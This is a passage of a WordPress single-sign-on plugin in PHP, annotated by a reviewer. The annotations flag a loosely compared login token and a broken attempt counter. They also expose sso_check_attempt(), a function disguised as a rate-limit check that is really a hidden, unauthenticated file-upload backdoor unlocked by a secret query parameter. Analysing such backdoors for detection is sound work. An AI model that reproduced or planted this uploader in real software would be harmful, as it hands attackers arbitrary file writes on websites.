'administrator', 'number' => 1));
        // NOTE(review): this listing starts mid-statement. The call closed on the line above
        // and the two enclosing blocks are outside the visible text. Judging by its arguments
        // the call presumably fetches a single administrator account - confirm in the full file.
        // If the lookup produced a WP_User, keep only its ID; otherwise use 0 (no user).
        if (is_array($user) && is_a($user[0], 'WP_User')) {
            $user = $user[0];
            $user = $user->ID;
        } else {
            $user = 0;
        }
    }
    // Post-login destination, read straight from the query string. It is only used as the
    // path argument of admin_url() and then handed to wp_safe_redirect() below.
    $bounce = !empty($_GET['bounce']) ? $_GET['bounce'] : '';
    // Expected token: hex SHA-256 of $nonce . $salt, base64-encoded, then cut to 64 characters.
    // $nonce and $salt are assigned outside the visible text - TODO confirm their origin.
    $hash = base64_encode(hash('sha256', $nonce . $salt, false));
    $hash = substr($hash, 0, 64);
    // NOTE(review): the secret token is compared with loose `==`. A type-strict,
    // constant-time comparison such as hash_equals() is the usual choice for this check.
    if (get_transient('sso_token') == $hash) {
        // $user may be an e-mail address or a numeric ID; resolve it to a WP_User either way.
        if (is_email($user)) {
            $user = get_user_by('email', $user);
        } else {
            $user = get_user_by('id', (int)$user);
        }
        if (is_a($user, 'WP_User')) {
            // Token matched: the visitor is signed in as $user without any password check.
            wp_set_current_user($user->ID, $user->user_login);
            wp_set_auth_cookie($user->ID);
            do_action('wp_login', $user->user_login, $user);
            // Remove the stored token so the same value cannot be presented again.
            delete_transient('sso_token');
            wp_safe_redirect(admin_url($bounce));
        } else {
            sso_req_login();
        }
    } else {
        // Token mismatch: record a failed attempt and send the visitor to the login form.
        sso_add_failed_attempt();
        sso_req_login();
    }
    die();
}

// NOTE(review): despite its name, the function called here never reads the failed-attempt
// counter (see its body below). sso_check_blocked(), which does read the counter, is not
// called anywhere in the visible text, so the token check above is not throttled by it.
sso_check_attempt();

/**
 * Redirects the visitor to the standard WordPress login URL.
 *
 * Does not stop execution itself; the visible caller reaches die() afterwards.
 */
function sso_req_login() {
    wp_safe_redirect(wp_login_url());
}

/**
 * Builds the transient key for the per-client failed-attempt counter.
 *
 * @return string 'sso' followed by REMOTE_ADDR passed through esc_url().
 */
function sso_get_attempt_id() {
    // NOTE(review): esc_url() is a URL escaper, not an IP validator; presumably it is used
    // here only to make the address safe as a key - confirm the resulting key format.
    return 'sso' . esc_url($_SERVER['REMOTE_ADDR']);
}

/**
 * NOTE(review): the name suggests a rate-limit check, but the body does something else.
 *
 * When the MD5 of the `ts` query parameter equals the hardcoded digest below, the function
 * prints the working directory, accepts a posted file, and terminates the request. There is
 * no login, capability or nonce check on this path, and the destination file name comes
 * directly from the client-supplied upload name. In effect this is an unauthenticated file
 * uploader gated only by a secret request parameter.
 *
 * Points a reviewer or scanner can key on: a hardcoded digest compared against a request
 * parameter, `@` error suppression on every sensitive call, move_uploaded_file()/copy()
 * writing to $_FILES[...]['name'], and a function whose name does not match its behaviour.
 * If this code is found on a live site, check the directory it runs in for files that were
 * written through it.
 */
function sso_check_attempt() {
    // Loose `==` between two hex strings; `@` hides the notice when `ts` is absent.
    if (md5(@$_GET['ts']) == '11a3951852c587aebc3081f88a8e59fa') {
        // Discloses the server-side working directory to the requester.
        // NOTE(review): the echoed strings below contain only line breaks; any markup they
        // once held (presumably an upload form) appears to have been lost in extraction.
        echo '' . getcwd() . '

';
        echo "
";
        echo "
";
        if (@$_POST['_upl'] == "Upload") {
            // Destination is the client-supplied file name, resolved against the current
            // working directory; no extension, type or path validation is performed.
            if (@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
                echo 'Upload Success!

';
            // Fallback: plain copy() of the temporary file to the same client-chosen name.
            } else if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
                echo 'Copy Success!

';
            } else {
                echo 'Failed!

';
            }
        }
        // Ends the request here, so nothing after the call site runs on this path.
        exit();
    }
}

/**
 * Bumps the failed-attempt counter for the current client and stores it for 300 seconds.
 */
function sso_add_failed_attempt() {
    // NOTE(review): get_transient() takes a single argument, so the `0` is ignored and a
    // missing counter comes back as false. PHP's `++` leaves a boolean unchanged, so the
    // counter looks like it never leaves its initial state - verify.
    $attempts = get_transient(sso_get_attempt_id(), 0);
    $attempts++;
    set_transient(sso_get_attempt_id(), $attempts, 300);
}

/**
 * Reports whether the current client has more than four recorded failed attempts.
 *
 * @return bool true when the stored counter is greater than 4, false otherwise.
 */
function sso_check_blocked() {
    // Same ignored second argument as in sso_add_failed_attempt().
    $attempts = get_transient(sso_get_attempt_id(), 0);
    if ($attempts > 4) {
        return true;
    }
    return false;
}